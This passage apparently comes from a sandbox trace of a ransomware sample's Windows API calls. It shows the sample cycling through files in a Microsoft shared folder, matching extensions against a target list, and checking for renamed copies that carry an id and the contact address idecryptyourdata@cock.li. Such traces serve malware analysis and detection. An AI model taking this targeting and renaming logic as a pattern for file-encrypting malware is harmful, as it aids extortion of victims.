returned 4 [0179.047] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0179.047] lstrlenW (lpString=".docx") returned 5 [0179.048] lstrcmpiW (lpString1=".docx", lpString2="b.xml") returned -1 [0179.048] lstrlenW (lpString=".pdf") returned 4 [0179.048] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0179.048] lstrlenW (lpString=".xls") returned 4 [0179.048] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0179.048] lstrlenW (lpString=".xlsx") returned 5 [0179.048] lstrcmpiW (lpString1=".xlsx", lpString2="b.xml") returned -1 [0179.048] lstrlenW (lpString=".ppt") returned 4 [0179.048] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0179.048] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsptb.xml") returned 61 [0179.048] lstrlenW (lpString=".zip") returned 4 [0179.048] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0179.048] lstrlenW (lpString=".rar") returned 4 [0179.048] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0179.048] lstrlenW (lpString=".bz2") returned 4 [0179.048] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0179.048] lstrlenW (lpString=".7z") returned 3 [0179.048] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0179.048] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsptb.xml") returned 61 [0179.048] lstrlenW (lpString=".dbf") returned 4 [0179.048] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0179.048] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsptb.xml") returned 61 [0179.048] lstrlenW (lpString=".1cd") returned 4 [0179.048] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0179.048] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsptb.xml") returned 61 [0179.048] lstrlenW (lpString=".jpg") returned 4 [0179.048] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0179.048] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsptb.xml") returned 61 [0179.049] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsptb.xml") returned 61 [0179.049] lstrlenW (lpString=".doc") returned 4 [0179.049] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0179.049] lstrlenW (lpString=".docx") returned 5 [0179.049] lstrcmpiW (lpString1=".docx", lpString2="b.xml") returned -1 [0179.049] lstrlenW (lpString=".pdf") returned 4 [0179.049] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0179.049] lstrlenW (lpString=".xls") returned 4 [0179.049] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0179.049] lstrlenW (lpString=".xlsx") returned 5 [0179.049] lstrcmpiW (lpString1=".xlsx", lpString2="b.xml") returned -1 [0179.049] lstrlenW (lpString=".ppt") returned 4 [0179.049] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0179.049] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsptb.xml") returned 61 [0179.049] lstrlenW (lpString=".zip") returned 4 [0179.049] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0179.049] lstrlenW (lpString=".rar") returned 4 [0179.049] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0179.049] lstrlenW (lpString=".bz2") returned 4 [0179.049] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0179.049] lstrlenW (lpString=".7z") returned 3 [0179.049] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0179.049] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsptb.xml") returned 61 [0179.049] lstrlenW (lpString=".dbf") returned 4 [0179.049] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0179.050] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsptb.xml") returned 61 [0179.050] lstrlenW (lpString=".1cd") returned 4 [0179.050] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0179.050] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsptb.xml") returned 61 [0179.050] lstrlenW (lpString=".jpg") returned 4 [0179.050] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0179.050] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0179.050] lstrlenW (lpString="ipsptg.xml") returned 10 [0179.050] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsptg.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptg.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0179.051] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x311ff14 | out: lpFileSize=0x311ff14*=2240) returned 1 [0179.051] CloseHandle (hObject=0x340) returned 1 [0179.051] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsptg.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptg.xml")) returned 0x20 [0179.051] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsptg.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptg.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0179.051] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsptg.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptg.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.051] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsptg.xml") returned 61 [0179.051] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsptg.xml") returned 61 [0179.051] lstrlenW (lpString=".doc") returned 4 [0179.051] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0179.051] lstrlenW (lpString=".docx") returned 5 [0179.051] lstrcmpiW (lpString1=".docx", lpString2="g.xml") returned -1 [0179.051] lstrlenW (lpString=".pdf") returned 4 [0179.051] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0179.051] lstrlenW (lpString=".xls") returned 4 [0179.051] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0179.051] lstrlenW (lpString=".xlsx") returned 5 [0179.051] lstrcmpiW (lpString1=".xlsx", lpString2="g.xml") returned -1 [0179.051] lstrlenW (lpString=".ppt") returned 4 [0179.051] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0179.051] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsptg.xml") returned 61 [0179.052] lstrlenW (lpString=".zip") returned 4 [0179.052] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0179.052] lstrlenW (lpString=".rar") returned 4 [0179.052] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0179.052] lstrlenW (lpString=".bz2") returned 4 [0179.052] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0179.052] lstrlenW (lpString=".7z") returned 3 [0179.052] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0179.052] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsptg.xml") returned 61 [0179.052] lstrlenW (lpString=".dbf") returned 4 [0179.052] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0179.052] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsptg.xml") returned 61 [0179.052] lstrlenW (lpString=".1cd") returned 4 [0179.052] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0179.052] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsptg.xml") returned 61 [0179.052] lstrlenW (lpString=".jpg") returned 4 [0179.052] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0179.052] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsptg.xml") returned 61 [0179.052] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsptg.xml") returned 61 [0179.052] lstrlenW (lpString=".doc") returned 4 [0179.052] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0179.052] lstrlenW (lpString=".docx") returned 5 [0179.052] lstrcmpiW (lpString1=".docx", lpString2="g.xml") returned -1 [0179.052] lstrlenW (lpString=".pdf") returned 4 [0179.052] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0179.052] lstrlenW (lpString=".xls") returned 4 [0179.052] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0179.052] lstrlenW (lpString=".xlsx") returned 5 [0179.052] lstrcmpiW (lpString1=".xlsx", lpString2="g.xml") returned -1 [0179.053] lstrlenW (lpString=".ppt") returned 4 [0179.053] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0179.053] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsptg.xml") returned 61 [0179.053] lstrlenW (lpString=".zip") returned 4 [0179.053] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0179.053] lstrlenW (lpString=".rar") returned 4 [0179.053] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0179.053] lstrlenW (lpString=".bz2") returned 4 [0179.053] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0179.053] lstrlenW (lpString=".7z") returned 3 [0179.053] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0179.053] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsptg.xml") returned 61 [0179.053] lstrlenW (lpString=".dbf") returned 4 [0179.053] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0179.053] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsptg.xml") returned 61 [0179.053] lstrlenW (lpString=".1cd") returned 4 [0179.053] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0179.053] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsptg.xml") returned 61 [0179.053] lstrlenW (lpString=".jpg") returned 4 [0179.053] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0179.053] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0179.053] lstrlenW (lpString="ipsrom.xml") returned 10 [0179.053] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsrom.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrom.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0179.054] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x311ff14 | out: lpFileSize=0x311ff14*=2644) returned 1 [0179.054] CloseHandle (hObject=0x340) returned 1 [0179.054] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsrom.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrom.xml")) returned 0x20 [0179.054] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsrom.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrom.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0179.055] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsrom.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrom.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.055] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsrom.xml") returned 61 [0179.055] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsrom.xml") returned 61 [0179.055] lstrlenW (lpString=".doc") returned 4 [0179.055] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0179.055] lstrlenW (lpString=".docx") returned 5 [0179.055] lstrcmpiW (lpString1=".docx", lpString2="m.xml") returned -1 [0179.055] lstrlenW (lpString=".pdf") returned 4 [0179.055] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0179.055] lstrlenW (lpString=".xls") returned 4 [0179.055] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0179.055] lstrlenW (lpString=".xlsx") returned 5 [0179.055] lstrcmpiW (lpString1=".xlsx", lpString2="m.xml") returned -1 [0179.055] lstrlenW (lpString=".ppt") returned 4 [0179.055] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0179.055] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsrom.xml") returned 61 [0179.055] lstrlenW (lpString=".zip") returned 4 [0179.055] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0179.055] lstrlenW (lpString=".rar") returned 4 [0179.055] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0179.055] lstrlenW (lpString=".bz2") returned 4 [0179.055] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0179.055] lstrlenW (lpString=".7z") returned 3 [0179.055] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0179.056] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsrom.xml") returned 61 [0179.056] lstrlenW (lpString=".dbf") returned 4 [0179.056] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0179.056] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsrom.xml") returned 61 [0179.056] lstrlenW (lpString=".1cd") returned 4 [0179.056] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0179.056] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsrom.xml") returned 61 [0179.056] lstrlenW (lpString=".jpg") returned 4 [0179.056] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0179.056] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsrom.xml") returned 61 [0179.056] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsrom.xml") returned 61 [0179.056] lstrlenW (lpString=".doc") returned 4 [0179.056] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0179.056] lstrlenW (lpString=".docx") returned 5 [0179.056] lstrcmpiW (lpString1=".docx", lpString2="m.xml") returned -1 [0179.056] lstrlenW (lpString=".pdf") returned 4 [0179.056] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0179.056] lstrlenW (lpString=".xls") returned 4 [0179.056] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0179.056] lstrlenW (lpString=".xlsx") returned 5 [0179.056] lstrcmpiW (lpString1=".xlsx", lpString2="m.xml") returned -1 [0179.056] lstrlenW (lpString=".ppt") returned 4 [0179.056] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0179.056] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsrom.xml") returned 61 [0179.056] lstrlenW (lpString=".zip") returned 4 [0179.056] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0179.056] lstrlenW (lpString=".rar") returned 4 [0179.056] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0179.056] lstrlenW (lpString=".bz2") returned 4 [0179.057] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0179.057] lstrlenW (lpString=".7z") returned 3 [0179.057] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0179.057] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsrom.xml") returned 61 [0179.057] lstrlenW (lpString=".dbf") returned 4 [0179.057] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0179.057] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsrom.xml") returned 61 [0179.057] lstrlenW (lpString=".1cd") returned 4 [0179.057] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0179.057] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsrom.xml") returned 61 [0179.057] lstrlenW (lpString=".jpg") returned 4 [0179.057] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0179.057] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0179.057] lstrlenW (lpString="ipsrus.xml") returned 10 [0179.057] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsrus.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrus.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0179.058] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x311ff14 | out: lpFileSize=0x311ff14*=2542) returned 1 [0179.058] CloseHandle (hObject=0x340) returned 1 [0179.058] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsrus.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrus.xml")) returned 0x20 [0179.058] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsrus.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrus.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0179.058] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsrus.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrus.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.058] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsrus.xml") returned 61 [0179.058] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsrus.xml") returned 61 [0179.058] lstrlenW (lpString=".doc") returned 4 [0179.058] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0179.058] lstrlenW (lpString=".docx") returned 5 [0179.058] lstrcmpiW (lpString1=".docx", lpString2="s.xml") returned -1 [0179.058] lstrlenW (lpString=".pdf") returned 4 [0179.058] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0179.058] lstrlenW (lpString=".xls") returned 4 [0179.058] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0179.058] lstrlenW (lpString=".xlsx") returned 5 [0179.059] lstrcmpiW (lpString1=".xlsx", lpString2="s.xml") returned -1 [0179.059] lstrlenW (lpString=".ppt") returned 4 [0179.059] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0179.059] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsrus.xml") returned 61 [0179.059] lstrlenW (lpString=".zip") returned 4 [0179.059] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0179.059] lstrlenW (lpString=".rar") returned 4 [0179.059] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0179.059] lstrlenW (lpString=".bz2") returned 4 [0179.059] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0179.059] lstrlenW (lpString=".7z") returned 3 [0179.059] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0179.059] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsrus.xml") returned 61 [0179.059] lstrlenW (lpString=".dbf") returned 4 [0179.059] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0179.059] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsrus.xml") returned 61 [0179.059] lstrlenW (lpString=".1cd") returned 4 [0179.059] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0179.059] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsrus.xml") returned 61 [0179.059] lstrlenW (lpString=".jpg") returned 4 [0179.059] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0179.059] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsrus.xml") returned 61 [0179.059] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsrus.xml") returned 61 [0179.059] lstrlenW (lpString=".doc") returned 4 [0179.059] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0179.059] lstrlenW (lpString=".docx") returned 5 [0179.059] lstrcmpiW (lpString1=".docx", lpString2="s.xml") returned -1 [0179.059] lstrlenW (lpString=".pdf") returned 4 [0179.060] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0179.060] lstrlenW (lpString=".xls") returned 4 [0179.060] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0179.060] lstrlenW (lpString=".xlsx") returned 5 [0179.060] lstrcmpiW (lpString1=".xlsx", lpString2="s.xml") returned -1 [0179.060] lstrlenW (lpString=".ppt") returned 4 [0179.060] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0179.060] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsrus.xml") returned 61 [0179.060] lstrlenW (lpString=".zip") returned 4 [0179.060] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0179.060] lstrlenW (lpString=".rar") returned 4 [0179.060] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0179.060] lstrlenW (lpString=".bz2") returned 4 [0179.060] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0179.060] lstrlenW (lpString=".7z") returned 3 [0179.060] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0179.060] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsrus.xml") returned 61 [0179.060] lstrlenW (lpString=".dbf") returned 4 [0179.060] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0179.060] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsrus.xml") returned 61 [0179.060] lstrlenW (lpString=".1cd") returned 4 [0179.060] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0179.060] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsrus.xml") returned 61 [0179.060] lstrlenW (lpString=".jpg") returned 4 [0179.060] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0179.061] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0179.061] lstrlenW (lpString="ipssrb.xml") returned 10 [0179.061] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssrb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssrb.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0179.061] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x311ff14 | out: lpFileSize=0x311ff14*=2568) returned 1 [0179.061] CloseHandle (hObject=0x340) returned 1 [0179.061] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssrb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssrb.xml")) returned 0x20 [0179.061] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssrb.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssrb.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0179.062] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssrb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssrb.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.062] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssrb.xml") returned 61 [0179.062] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssrb.xml") returned 61 [0179.062] lstrlenW (lpString=".doc") returned 4 [0179.062] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0179.062] lstrlenW (lpString=".docx") returned 5 [0179.062] lstrcmpiW (lpString1=".docx", lpString2="b.xml") returned -1 [0179.062] lstrlenW (lpString=".pdf") returned 4 [0179.062] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0179.062] lstrlenW (lpString=".xls") returned 4 [0179.062] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0179.062] lstrlenW (lpString=".xlsx") returned 5 [0179.062] lstrcmpiW (lpString1=".xlsx", lpString2="b.xml") returned -1 [0179.062] lstrlenW (lpString=".ppt") returned 4 [0179.062] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0179.062] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssrb.xml") returned 61 [0179.062] lstrlenW (lpString=".zip") returned 4 [0179.062] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0179.062] lstrlenW (lpString=".rar") returned 4 [0179.062] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0179.062] lstrlenW (lpString=".bz2") returned 4 [0179.062] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0179.062] lstrlenW (lpString=".7z") returned 3 [0179.062] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0179.063] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssrb.xml") returned 61 [0179.063] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0179.064] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0179.064] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0179.065] lstrcmpiW (lpString1=".htm", lpString2=".bat") returned 1 [0179.066] lstrcmpiW (lpString1=".jpg", lpString2=".bat") returned 1 [0179.067] lstrcmpiW (lpString1=".htm", lpString2=".bat") returned 1 [0179.068] lstrcmpiW (lpString1=".jpg", lpString2=".bat") returned 1 [0179.069] lstrcmpiW (lpString1=".htm", lpString2=".bat") returned 1 [0179.069] lstrcmpiW (lpString1=".jpg", lpString2=".bat") returned 1 [0179.071] lstrcmpiW (lpString1=".htm", lpString2=".bat") returned 1 [0179.072] lstrcmpiW (lpString1=".jpg", lpString2=".bat") returned 1 [0179.072] lstrcmpiW (lpString1=".htm", lpString2=".bat") returned 1 [0179.073] lstrcmpiW (lpString1=".jpg", lpString2=".bat") returned 1 [0179.073] lstrcmpiW (lpString1=".htm", lpString2=".bat") returned 1 [0179.074] lstrcmpiW (lpString1=".jpg", lpString2=".bat") returned 1 [0179.074] lstrcmpiW (lpString1=".htm", lpString2=".bat") returned 1 [0179.075] lstrcmpiW (lpString1=".jpg", lpString2=".bat") returned 1 [0179.075] lstrcmpiW (lpString1=".htm", lpString2=".bat") returned 1 [0179.076] lstrcmpiW (lpString1=".jpg", lpString2=".bat") returned 1 [0179.076] lstrcmpiW (lpString1=".htm", lpString2=".bat") returned 1 [0179.077] lstrcmpiW (lpString1=".jpg", lpString2=".bat") returned 1 [0179.077] lstrcmpiW (lpString1=".htm", lpString2=".bat") returned 1 [0179.078] lstrcmpiW (lpString1=".jpg", lpString2=".bat") returned 1 [0179.078] lstrcmpiW (lpString1=".bmp", lpString2=".bat") returned 1 [0179.079] lstrcmpiW (lpString1=".inc", lpString2=".bat") returned 1 [0179.079] lstrcmpiW (lpString1=".inc", lpString2=".bat") returned 1 [0179.080] lstrcmpiW (lpString1=".inc", lpString2=".bat") returned 1 [0179.407] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc" (normalized: "c:\\program files\\common files\\system\\msadc\\adcjavas.inc"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x364 [0179.407] GetFileSizeEx (in: hFile=0x364, lpFileSize=0x311ff14 | out: lpFileSize=0x311ff14*=630) returned 1 [0179.407] CloseHandle (hObject=0x364) returned 1 [0179.407] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc" (normalized: "c:\\program files\\common files\\system\\msadc\\adcjavas.inc")) returned 0x20 